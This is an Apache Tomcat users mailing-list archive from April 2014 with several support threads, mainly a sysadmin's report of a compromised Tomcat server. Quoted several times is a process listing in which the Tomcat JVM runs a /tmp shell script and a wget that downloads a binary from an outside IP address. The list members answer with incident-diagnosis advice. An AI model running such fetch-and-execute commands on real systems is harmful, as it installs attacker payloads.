>>> A classic example of such an intrusion might be that someone got a
>>> foothold elsewhere into your network, and the Manager web
>application
>>> is not properly secured with a password, etc.
>>>
>>> - -chris

RE: Regarding i think an intrusion

2014-04-30 Thread Martin Gainty

> Date: Wed, 30 Apr 2014 12:35:52 -0300
> Subject: Re: Regarding i think an intrusion
> From: lsantagost...@gmail.com
> To: users@tomcat.apache.org
> 
> Hello list,
> 
> well my homework is done
> 
> Here are the links:
> 
> setenv.sh: http://pastebin.com/EN1mXDFi
> catalina.sh: http://pastebin.com/1vRVLbSm
> web.xml: http://pastebin.com/BqEfiXXm
> server.xml: http://pastebin.com/wfzE8bYU
> logging.properties: http://pastebin.com/Qurk8sLU
> catalina.properties: http://pastebin.com/jkfY1ZRQ
> tree + logsfiles: http://pastebin.com/j3tip4ij

MG>Please paste the contents of the following log files into
Pastebin and send us the link:

-rw-rw-r-- 1 tomcat tomcat  5.0K Apr 30 05:38 localhost.2014-04-30.log
-rw-rw-r-- 1 tomcat tomcat  5.4M Apr 30 12:19 localhost_access_log.2014-04-30.txt
-rw-rw-r-- 1 tomcat tomcat     0 Apr 30 05:38 manager.2014-04-30.log
-rw-rw-r-- 1 tomcat tomcat  3.7M Apr 30 12:19 PDI_access_log.2014-04-30.txt
-rw-rw-r-- 1 tomcat tomcat   43M Apr 30 12:18 portal-ht.log
-rw-rw-r-- 1 tomcat tomcat  583K Apr 30 10:09 portal-mh.log
-rw-rw-r-- 1 tomcat tomcat   58M Apr 30 12:19 portal-pdi.log
-rw-rw-r-- 1 tomcat tomcat  3.5M Apr 30 12:18 portal-rt.log
-rw-rw-r-- 1 tomcat tomcat  3.6M Apr 30 12:18 probe.log
-rw-rw-r-- 1 tomcat tomcat  591K Apr 30 12:18 RT_access_log.2014-04-30.txt

MG>Kind regards from the USA

> 
> Note that logsfiles, are not the logfiles itsef but only a ls -lah (just
> for you to see the logsizes)
> 
> A little more about the infraestructure i've mounted ill do some ascii art.
> 
> 
> internet ---> FW -->nat-->Haproxy (1)-->Apache(2)--> mod_jk
> (3)-->Haproxy(4)--> Tomcat7(5) --> haproxy(6) --Tomcat(7)
> 
> 
> Apache(2) is serving static content so haproxy(1) at the first level does
> http round robin balancing
> Apache(2) connects to tomcat(5) through haproxy(4) (using L4 connection)
> using mod_jk(3)
> Tomcat(5) are the main app server (the ones gets intruded) who uses
> tomcat(7) (solr service) using haproxy(6) using L4 connection.
> 
> Versions:
> 
> Apache: 2.2.17
> mod_jk: 1.2.31
> haproxy: 1.4.22
> Tomcat: 7.0.53
> Java: 1.6.0.41
> 
> [root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version
> java version "1.6.0_41"
> Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
> Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)
> 
> OS: CentOS 5.8 64 bit
> 
> [root@arcbaappvrt05 tomcat]# uname -a
> Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 21
> 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
> [root@arcbaappvrt05 tomcat]# cat /etc/redhat-release
> CentOS release 5.8 (Final)
> [root@arcbaappvrt05 tomcat]#
> 
> For now i havent see that the squid process whas launched so i couldnt do a
> dump
> 
> Letme know if you need more information.
> 
> BTW, pastebin links will work for one week.
> 
> Kind regards, yours
> 
> 
> 
> 
> Saludos.-
> Leonardo Santagostini
> 
> 
> 
> 
> 
> 
> 
> 2014-04-30 11:09 GMT-03:00 Leonardo Santagostini :
> 
> > Ok, i will do the following:
> >
> > 1) thread dump of running tomcat instance
> > 2) Pastebin the running tomcat config
> >
> > I think at mid day will have all the info.
> >
> > Thanks all for replying me and all the responses.
> >
> > Regards, Leonardo
> >
> > Saludos.-
> > Leonardo Santagostini
> >
> > 
> >
> >
> >
> >
> >
> > 2014-04-30 10:55 GMT-03:00 Christopher Schultz <
> > ch...@christopherschultz.net>:
> >
> > -BEGIN PGP SIGNED MESSAGE-
> >> Hash: SHA256
> >>
> >> Konstantin,
> >>
> >> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
> >> > 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
> >> > :
> >> >> Hello Dan,
> >> >>
> >> >> Nop, the attacker is executing locally the following
> >> >>
> >> >> tomcat8882 1  0 Apr27 ?00:00:00 sh /tmp/4.sh
> >> >> tomcat8893  8882  0 Apr27 ?00:00:00 wget
> >> >> http://218.199.102.59/.xy/squid32 -O /tmp/squid
> >> >>
> >> >> And the launch squid who tries to connect via ssh to varoius
> >> >> places.
> >> >>
> >> >> Right now its time to leave the office, but in a few hours i will
> >> >> paste in pastebin access logs, config files, wherever you tell
> >> >> me.
> >> >>
> >> >> This is my pstree
> >> >>
> >> >> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd
> >> >> ├─java─┬─sh───wget │  └─263*[{java}]
> >> >
> >> > sh launched by tomcat's java?
> >>
> >> Yes: please verify that it's the JVM running Tomcat, and not just any
> >> JVM process.
> >>
> >> > Take a thread dump:
> >> >
> >> https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
> >> >
> >> >  It shall show what is stacktrace in thread that launched external
> >> > process.
> >>
> >> +1
> >>
> >> The only things that ship with Tomcat that call Process.exec() are the
> >> CGI servlet and SSI, both of which are disabled by default. So, either
> >> you have an insecure CGI/SSI configuration, your web application

Re: Regarding i think an intrusion

2014-04-30 Thread Christopher Schultz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Leonardo,

You need to post a thread dump as well.

- -chris

On 4/30/14, 11:35 AM, Leonardo Santagostini wrote:
> Hello list,
> 
> well my homework is done
> 
> Here are the links:
> 
> setenv.sh: http://pastebin.com/EN1mXDFi catalina.sh: 
> http://pastebin.com/1vRVLbSm web.xml: http://pastebin.com/BqEfiXXm
>  server.xml: http://pastebin.com/wfzE8bYU logging.properties: 
> http://pastebin.com/Qurk8sLU catalina.properties: 
> http://pastebin.com/jkfY1ZRQ tree + logsfiles: 
> http://pastebin.com/j3tip4ij
> 
> Note that logsfiles are not the log files themselves but only an ls -lah 
> (just for you to see the log sizes).
> 
> A little more about the infrastructure I've mounted; I'll do some 
> ASCII art.
> 
> 
> internet ---> FW -->nat-->Haproxy (1)-->Apache(2)--> mod_jk 
> (3)-->Haproxy(4)--> Tomcat7(5) --> haproxy(6) --Tomcat(7)
> 
> 
> Apache(2) is serving static content, so haproxy(1) at the first 
> level does HTTP round-robin balancing. Apache(2) connects to 
> tomcat(5) through haproxy(4) (using an L4 connection) using mod_jk(3).
> Tomcat(5) is the main app server (the one that got intruded), which 
> uses tomcat(7) (Solr service) through haproxy(6), using an L4 
> connection.
> 
> Versions:
> 
> Apache: 2.2.17 mod_jk: 1.2.31 haproxy: 1.4.22 Tomcat: 7.0.53 Java: 
> 1.6.0.41
> 
> [root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version 
> java version "1.6.0_41" Java(TM) SE Runtime Environment (build 
> 1.6.0_41-b02) Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, 
> mixed mode)
> 
> OS: CentOS 5.8 64 bit
> 
> [root@arcbaappvrt05 tomcat]# uname -a Linux 
> arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 
> 21 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux 
> [root@arcbaappvrt05 tomcat]# cat /etc/redhat-release CentOS
> release 5.8 (Final) [root@arcbaappvrt05 tomcat]#
> 
> For now I haven't seen that the squid process was launched, so I 
> couldn't do a dump.
> 
> Let me know if you need more information.
> 
> BTW, pastebin links will work for one week.
> 
> Kind regards, yours
> 
> 
> 
> 
> Saludos.- Leonardo Santagostini
> 
> 
> 
> 
> 
> 
> 
> 2014-04-30 11:09 GMT-03:00 Leonardo Santagostini 
> :
> 
>> OK, I will do the following:
>> 
>> 1) thread dump of running tomcat instance 2) Pastebin the
>> running tomcat config
>> 
>> I think at midday I will have all the info.
>> 
>> Thanks to all for replying and for all the responses.
>> 
>> Regards, Leonardo
>> 
>> Saludos.- Leonardo Santagostini
>> 
>> 
>> 
>> 
>> 
>> 
>> 
>> 2014-04-30 10:55 GMT-03:00 Christopher Schultz < 
>> ch...@christopherschultz.net>:
>> 
>> -BEGIN PGP SIGNED MESSAGE-
>>> Hash: SHA256
>>> 
>>> Konstantin,
>>> 
>>> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
>>>> 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini 
>>>> :
>>>>> Hello Dan,
>>>>> 
>>>>> Nop, the attacker is executing locally the following
>>>>> 
>>>>> tomcat8882 1  0 Apr27 ?00:00:00 sh 
>>>>> /tmp/4.sh tomcat8893  8882  0 Apr27 ?00:00:00 
>>>>> wget http://218.199.102.59/.xy/squid32 -O /tmp/squid
>>>>> 
>>>>> And the launch squid who tries to connect via ssh to 
>>>>> various places.
>>>>> 
>>>>> Right now it's time to leave the office, but in a few hours 
>>>>> I will paste in pastebin access logs, config files, 
>>>>> wherever you tell me.
>>>>> 
>>>>> This is my pstree
>>>>> 
>>>>> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree 
>>>>> init─┬─atd ├─java─┬─sh───wget │  └─263*[{java}]
>>>> 
>>>> sh launched by tomcat's java?
>>> 
>>> Yes: please verify that it's the JVM running Tomcat, and not 
>>> just any JVM process.
>>> 
>>>> Take a thread dump:
>>>> 
>>>> https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
>>>> 
>>>> It shall show what is stacktrace in thread that launched external
>>>> process.
>>> 
>>> +1
>>> 
>>> The only things that ship with Tomcat that call Process.exec() 
>>> are the CGI servlet and SSI, both of which are disabled by 
>>> default. So, either you have an insecure CGI/SSI
>>> configuration, your web application has a vulnerability, or you
>>> have deployed something like the Manager application and
>>> improperly-secured it.
>>> 
>>> A classic example of such an intrusion might be that someone 
>>> got a foothold elsewhere into your network, and the Manager
>>> web application is not properly secured with a password, etc.
>>> 
>>> - -chris
>>> -BEGIN PGP SIGNATURE-
>>> Version: GnuPG v1
>>> Comment: GPGTools - http://gpgtools.org
>>> Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
>>> 
>>> iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp
>>> +qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4
>>> HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC
>>> D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o
>>> gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliym

Re: Regarding i think an intrusion

2014-04-30 Thread Leonardo Santagostini
Hello list,

Well, my homework is done.

Here are the links:

setenv.sh: http://pastebin.com/EN1mXDFi
catalina.sh: http://pastebin.com/1vRVLbSm
web.xml: http://pastebin.com/BqEfiXXm
server.xml: http://pastebin.com/wfzE8bYU
logging.properties: http://pastebin.com/Qurk8sLU
catalina.properties: http://pastebin.com/jkfY1ZRQ
tree + logsfiles: http://pastebin.com/j3tip4ij

Note that logsfiles are not the log files themselves but only an ls -lah (just
for you to see the log sizes).

A little more about the infrastructure I've mounted; I'll do some ASCII art.


internet ---> FW -->nat-->Haproxy (1)-->Apache(2)--> mod_jk
(3)-->Haproxy(4)--> Tomcat7(5) --> haproxy(6) --Tomcat(7)


Apache(2) is serving static content, so haproxy(1) at the first level does
HTTP round-robin balancing.
Apache(2) connects to tomcat(5) through haproxy(4) (using an L4 connection)
using mod_jk(3).
Tomcat(5) is the main app server (the one that got intruded), which uses
tomcat(7) (Solr service) through haproxy(6), using an L4 connection.

Versions:

Apache: 2.2.17
mod_jk: 1.2.31
haproxy: 1.4.22
Tomcat: 7.0.53
Java: 1.6.0.41

[root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version
java version "1.6.0_41"
Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)

OS: CentOS 5.8 64 bit

[root@arcbaappvrt05 tomcat]# uname -a
Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 21
20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
[root@arcbaappvrt05 tomcat]# cat /etc/redhat-release
CentOS release 5.8 (Final)
[root@arcbaappvrt05 tomcat]#

For now I haven't seen that the squid process was launched, so I couldn't do a
dump.

Let me know if you need more information.

BTW, pastebin links will work for one week.

Kind regards, yours




Saludos.-
Leonardo Santagostini







2014-04-30 11:09 GMT-03:00 Leonardo Santagostini :

> OK, I will do the following:
>
> 1) thread dump of running tomcat instance
> 2) Pastebin the running tomcat config
>
> I think at midday I will have all the info.
>
> Thanks to all for replying and for all the responses.
>
> Regards, Leonardo
>
> Saludos.-
> Leonardo Santagostini
>
> 
>
>
>
>
>
> 2014-04-30 10:55 GMT-03:00 Christopher Schultz <
> ch...@christopherschultz.net>:
>
> -BEGIN PGP SIGNED MESSAGE-
>> Hash: SHA256
>>
>> Konstantin,
>>
>> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
>> > 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
>> > :
>> >> Hello Dan,
>> >>
>> >> Nop, the attacker is executing locally the following
>> >>
>> >> tomcat8882 1  0 Apr27 ?00:00:00 sh /tmp/4.sh
>> >> tomcat8893  8882  0 Apr27 ?00:00:00 wget
>> >> http://218.199.102.59/.xy/squid32 -O /tmp/squid
>> >>
>> >> And the launch squid who tries to connect via ssh to various
>> >> places.
>> >>
>> >> Right now it's time to leave the office, but in a few hours I will
>> >> paste in pastebin access logs, config files, wherever you tell
>> >> me.
>> >>
>> >> This is my pstree
>> >>
>> >> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd
>> >> ├─java─┬─sh───wget │  └─263*[{java}]
>> >
>> > sh launched by tomcat's java?
>>
>> Yes: please verify that it's the JVM running Tomcat, and not just any
>> JVM process.
>>
>> > Take a thread dump:
>> >
>> https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
>> >
>> >  It shall show what is stacktrace in thread that launched external
>> > process.
>>
>> +1
>>
>> The only things that ship with Tomcat that call Process.exec() are the
>> CGI servlet and SSI, both of which are disabled by default. So, either
>> you have an insecure CGI/SSI configuration, your web application has a
>> vulnerability, or you have deployed something like the Manager
>> application and improperly-secured it.
>>
>> A classic example of such an intrusion might be that someone got a
>> foothold elsewhere into your network, and the Manager web application
>> is not properly secured with a password, etc.
>>
>> - -chris
>> -BEGIN PGP SIGNATURE-
>> Version: GnuPG v1
>> Comment: GPGTools - http://gpgtools.org
>> Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
>>
>> iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp
>> +qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4
>> HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC
>> D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o
>> gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliymQu2qbVgpRvoJ+baRgpeoyt6hzhIxr
>> BA8gjKY5xOH6QrpSX2tdU8RNCRVLIgSmbp9Mj+Hovdw4kkDMLQvS3osuGq5HaEwS
>> ZMltWiTef+K2yZyO3L8xrsJaRbox1j8Pg38ea22GRE48kpNagoQdCM2+uMCVN8Yj
>> UFjUrcpMu0FX06dy8azbFDRZMv5lD8nmwgE624nT+gZfFaxGHNLa9dRpJWHZgvTb
>> TSESKHv2lq9F4qc7bxoVrRDa8hnNLHk2luU9qot5JWXnb5en0fFKMZopwXwXYA4W
>> WgGA0Cfy4gALkA4/CCqrsn6Z+EqIxXNdCn74CeeCh5fV28+0Zpuj7G1adtJUkCQ7
>> 87Cq6kXwHx4hfp//6vQhnZIGWYeKDOIgqbKuaP27pIcE1QCag5MOlmVT4pQjpT12
>> lvJcfOh

Tomcat 8.0.3.0 getting never before seen by google Illegal State Exception. Sevlets outputting the audio output from the previous runs of the program instead of the current run.

2014-04-30 Thread Hayward, Leigh

Hello all,

My Java EE web application takes in multiple audio inputs and outputs
them as a single wav file via an application/octet stream.

It seemingly randomly works correctly (i.e. outputting the correctly
manipulated audio file) but sometimes, the file from a previous
run of the program is output and I get one of these errors:

SEVERE [http-nio-8084-exec-30] 
org.apache.catalina.loader.WebappClassLoader.clearReferencesThreads The web 
application [/MyApp] is still processing a request that has yet to finish. This 
is very likely to create a memory leak. You can control the time allowed for 
requests to finish by using the unloadDelay attribute of the standard Context 
implementation.

and to me seemingly random numbers of these errors:

"SEVERE [http-nio-8084-exec-87] 
org.apache.coyote.http11.AbstractHttp11Processor.process Error processing 
request java.lang.IllegalStateException: The resources may not be accessed if 
they are not currently started?"

The files always upload correctly to my filesystem, but something is
going wrong when I try to access them in order to process them.

Also when it is downloading the file it appears to the user
to be several MB long despite the file that is output being only a few
thousand KB.

Sometimes when it doesn't work it does not produce these errors, but it
never produces these errors when it works correctly.

I have googled it but there's no reference to the second kind of error
anywhere on the web aside from svn commits by tomcat developers,
so while I am a total newbie to mailing lists, after exhausting
Stack Overflow this seemed like the only place to turn to. I'm
developing a Java EE web application in NetBeans using Tomcat
8.0.3.0 on a Windows 7 operating system.

The web application is very basic and allows users to upload files via a
multipart HTML form. This then posts to a servlet which first uploads these
files to the program's file system and then accesses them, concatenates
them and saves them back on the file system.
It's better explained by this diagram: http://imgur.com/Oacd4gq
Could it be that the files are not being uploaded fully before they are
being accessed?

Sorry if this email looks like shit; I'm being forced to use Outlook
by my university!

Thank you for taking the time to read my post.

Best wishes to you all regardless,
Leigh
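One failure mode that produces exactly the symptom described above (a previous run's output being served to the next user) is a scratch file whose path is the same for every request: two requests on different servlet threads both write it, and whoever reads it afterwards gets the last writer's data. The following is an added Python model of that handler pattern and of the per-request alternative; it is not Leigh's servlet code. `merge_audio`, `begin` and `finish` are stand-ins for the upload/concatenate/stream steps, and the two handler classes and the `interleaved` driver are constructed for the illustration.

```python
"""Added example: a scratch file with a fixed name versus a per-request one.

Not Leigh's servlet. `begin` stands for "save the uploads and write the
merged file", `finish` for "stream the merged file back"; between the two
steps another request can run on a different servlet thread.
"""
import shutil
import tempfile
from pathlib import Path


def merge_audio(parts):
    # Stand-in for the real concatenation; a real WAV merge must rewrite the header.
    return b"".join(parts)


class FixedNameHandler:
    """Every request writes to, and later reads from, <workdir>/finished.wav."""

    def __init__(self, workdir):
        self.outfile = Path(workdir) / "finished.wav"

    def begin(self, parts):
        self.outfile.write_bytes(merge_audio(parts))
        return self.outfile          # the "request handle" is the shared path

    def finish(self, handle):
        return handle.read_bytes()   # whoever wrote last wins


class PerRequestHandler:
    """Each request gets its own directory; nothing is shared between requests."""

    def __init__(self, workdir):
        self.workdir = Path(workdir)

    def begin(self, parts):
        reqdir = Path(tempfile.mkdtemp(prefix="req-", dir=self.workdir))
        outfile = reqdir / "finished.wav"
        outfile.write_bytes(merge_audio(parts))
        return outfile

    def finish(self, handle):
        try:
            return handle.read_bytes()
        finally:
            shutil.rmtree(handle.parent, ignore_errors=True)  # clean up even on error


def interleaved(handler_cls):
    """Two overlapping requests: both save before either streams its result."""
    with tempfile.TemporaryDirectory() as workdir:
        handler = handler_cls(workdir)
        alice = handler.begin([b"alice-1", b"alice-2"])
        bob = handler.begin([b"bob-1", b"bob-2"])
        return handler.finish(alice), handler.finish(bob)


if __name__ == "__main__":
    print("fixed name  :", interleaved(FixedNameHandler))
    print("per request :", interleaved(PerRequestHandler))
```

With the fixed name both users receive Bob's file; with a per-request directory each gets their own. In a servlet the equivalent is `Files.createTempDirectory` (or `File.createTempFile`) per request, with deletion in a `finally` block, instead of a constant path under the webapp.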









Re: Regarding i think an intrusion

2014-04-30 Thread Leonardo Santagostini
OK, I will do the following:

1) thread dump of running tomcat instance
2) Pastebin the running tomcat config

I think at midday I will have all the info.

Thanks to all for replying and for all the responses.

Regards, Leonardo

Saludos.-
Leonardo Santagostini







2014-04-30 10:55 GMT-03:00 Christopher Schultz :

> -BEGIN PGP SIGNED MESSAGE-
> Hash: SHA256
>
> Konstantin,
>
> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
> > 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
> > :
> >> Hello Dan,
> >>
> >> Nop, the attacker is executing locally the following
> >>
> >> tomcat8882 1  0 Apr27 ?00:00:00 sh /tmp/4.sh
> >> tomcat8893  8882  0 Apr27 ?00:00:00 wget
> >> http://218.199.102.59/.xy/squid32 -O /tmp/squid
> >>
> >> And the launch squid who tries to connect via ssh to various
> >> places.
> >>
> >> Right now it's time to leave the office, but in a few hours I will
> >> paste in pastebin access logs, config files, wherever you tell
> >> me.
> >>
> >> This is my pstree
> >>
> >> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd
> >> ├─java─┬─sh───wget │  └─263*[{java}]
> >
> > sh launched by tomcat's java?
>
> Yes: please verify that it's the JVM running Tomcat, and not just any
> JVM process.
>
> > Take a thread dump:
> >
> https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
> >
> >  It shall show what is stacktrace in thread that launched external
> > process.
>
> +1
>
> The only things that ship with Tomcat that call Process.exec() are the
> CGI servlet and SSI, both of which are disabled by default. So, either
> you have an insecure CGI/SSI configuration, your web application has a
> vulnerability, or you have deployed something like the Manager
> application and improperly-secured it.
>
> A classic example of such an intrusion might be that someone got a
> foothold elsewhere into your network, and the Manager web application
> is not properly secured with a password, etc.
>
> - -chris
> -BEGIN PGP SIGNATURE-
> Version: GnuPG v1
> Comment: GPGTools - http://gpgtools.org
> Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/
>
> iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp
> +qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4
> HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC
> D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o
> gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliymQu2qbVgpRvoJ+baRgpeoyt6hzhIxr
> BA8gjKY5xOH6QrpSX2tdU8RNCRVLIgSmbp9Mj+Hovdw4kkDMLQvS3osuGq5HaEwS
> ZMltWiTef+K2yZyO3L8xrsJaRbox1j8Pg38ea22GRE48kpNagoQdCM2+uMCVN8Yj
> UFjUrcpMu0FX06dy8azbFDRZMv5lD8nmwgE624nT+gZfFaxGHNLa9dRpJWHZgvTb
> TSESKHv2lq9F4qc7bxoVrRDa8hnNLHk2luU9qot5JWXnb5en0fFKMZopwXwXYA4W
> WgGA0Cfy4gALkA4/CCqrsn6Z+EqIxXNdCn74CeeCh5fV28+0Zpuj7G1adtJUkCQ7
> 87Cq6kXwHx4hfp//6vQhnZIGWYeKDOIgqbKuaP27pIcE1QCag5MOlmVT4pQjpT12
> lvJcfOhzHLwo07Pv+y3J
> =EiX9
> -END PGP SIGNATURE-
>
> -
> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
> For additional commands, e-mail: users-h...@tomcat.apache.org
>
>


Re: Setup Issue tomcat 6 SLES 11 SSL

2014-04-30 Thread Christopher Schultz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Vincent,

On 4/29/14, 4:24 PM, Vincent T. DiScipio wrote:
> I have setup tomcat 6 on SLES 11 and secured the instance with an 
> external certificate if authority.  The following is occurring
> from the same machine using both IE and Firefox:
> 
> http://servername.wooster.edu:8080 works for both IE11 and
> Firefox 29 and displays the index.html
> 
> https://servername.wooster.edu:8443  works for Firefox 29 and 
> displays the index.html
> 
> https://servername.wooster.edu:8443  does not work for IE11 and
> displays "This page can't be displayed"
> 
> I have changed the logging level to finest and do not see any
> errors in the catalina.out.
> 
> Thoughts?  I have the same setup on another server and I believe
> the files and permission levels are set the same.

What does your SSL configuration look like?

You could also use either sslscan from the CLI or go to
https://www.ssllabs.com/ssltest/ and use their online tool to examine
the site from the outside.

Perhaps you have a combination of protocols and ciphers that MSIE
can't handle.

- -chris

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org



Re: javaagent initialization (premain-method) not triggered by tomcat 7.0.52

2014-04-30 Thread Christopher Schultz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Konstantin,

On 4/29/14, 7:17 PM, Konstantin Kolinko wrote:
> 2014-04-29 12:28 GMT+04:00 Fredrik
> :
>> Hello. We're using jamm (https://github.com/jbellis/jamm) a java
>> agent for measuring object memory usage, passing the javaagent
>> argument to tomcat as 
>> "-javaagent:../../tomcat/webapps/ROOT/WEB-INF/lib/jamm-0.2.3.jar".
>> When running 7.0.50 everything works as expected but after upgrading to
>> 7.0.52 the initialization code of the agent (premain-method)
>> isn't called anymore. Any ideas?
> 
> 
> I understand that that means that you have the same jar present in 
> both the System classloader and the Webapp classloader.
> 
> You should remove that jar from WEB-INF/lib directory of that
> webapp.
> 
> IIRC, in 7.0.50 and earlier Tomcat preferred the class from the
> system classloader (effectively ignoring the webapp's jar).
> 
> In 7.0.52 it does load the class provided by web application.

Actually, I'd like an explanation of the above. I'm not saying it's
wrong or makes no sense, but I don't quite understand how it could
interfere:

The javaagent should be loaded at JVM launch, which is before any web
applications exist, so no ClassLoader conflict should occur.

When a remote process connects to the agent, it should do so out of
context of any web application (that is, the thread that handles the
connection should not have its ClassLoader set to the
WebappClassLoader of any deployed web application), so no classes
should be loaded from the WebappClassLoader.

- -chris

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org



Re: Regarding i think an intrusion

2014-04-30 Thread Christopher Schultz
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Konstantin,

On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
> 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini
> :
>> Hello Dan,
>> 
>> Nop, the attacker is executing locally the following
>> 
>> tomcat8882 1  0 Apr27 ?00:00:00 sh /tmp/4.sh 
>> tomcat8893  8882  0 Apr27 ?00:00:00 wget 
>> http://218.199.102.59/.xy/squid32 -O /tmp/squid
>> 
>> And the launch squid who tries to connect via ssh to various
>> places.
>> 
>> Right now it's time to leave the office, but in a few hours I will
>> paste in pastebin access logs, config files, wherever you tell
>> me.
>> 
>> This is my pstree
>> 
>> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree init─┬─atd 
>> ├─java─┬─sh───wget │  └─263*[{java}]
> 
> sh launched by tomcat's java?

Yes: please verify that it's the JVM running Tomcat, and not just any
JVM process.

> Take a thread dump: 
> https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
>
>  It shall show what is stacktrace in thread that launched external
> process.

+1

The only things that ship with Tomcat that call Process.exec() are the
CGI servlet and SSI, both of which are disabled by default. So, either
you have an insecure CGI/SSI configuration, your web application has a
vulnerability, or you have deployed something like the Manager
application and improperly-secured it.

A classic example of such an intrusion might be that someone got a
foothold elsewhere into your network, and the Manager web application
is not properly secured with a password, etc.

- -chris
-BEGIN PGP SIGNATURE-
Version: GnuPG v1
Comment: GPGTools - http://gpgtools.org
Comment: Using GnuPG with Thunderbird - http://www.enigmail.net/

iQIcBAEBCAAGBQJTYQDeAAoJEBzwKT+lPKRYaPoQAKpqrj5bWfGXpEEHMINjw1Qp
+qqdL7O61QLmWoA1neUbyM7A2s8mY3lRdcZwDw2IG33xoeLuFaavhFlDGr2Txer4
HiGDR8ixOv2mY9J9bMC889hih4N5dz0fYlw/b5SouUVz2aCbeUhYK+6lsBXRy2fC
D+UoNOiQF6uX2ZlqJYZTAvgzC2t/SGGnTW3GLx+3buRxs4JlUjJ8RWEOZtjZLQ5o
gUZ+UF6K/7dewYr6TjDmwc1C226dJNaliymQu2qbVgpRvoJ+baRgpeoyt6hzhIxr
BA8gjKY5xOH6QrpSX2tdU8RNCRVLIgSmbp9Mj+Hovdw4kkDMLQvS3osuGq5HaEwS
ZMltWiTef+K2yZyO3L8xrsJaRbox1j8Pg38ea22GRE48kpNagoQdCM2+uMCVN8Yj
UFjUrcpMu0FX06dy8azbFDRZMv5lD8nmwgE624nT+gZfFaxGHNLa9dRpJWHZgvTb
TSESKHv2lq9F4qc7bxoVrRDa8hnNLHk2luU9qot5JWXnb5en0fFKMZopwXwXYA4W
WgGA0Cfy4gALkA4/CCqrsn6Z+EqIxXNdCn74CeeCh5fV28+0Zpuj7G1adtJUkCQ7
87Cq6kXwHx4hfp//6vQhnZIGWYeKDOIgqbKuaP27pIcE1QCag5MOlmVT4pQjpT12
lvJcfOhzHLwo07Pv+y3J
=EiX9
-END PGP SIGNATURE-

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org
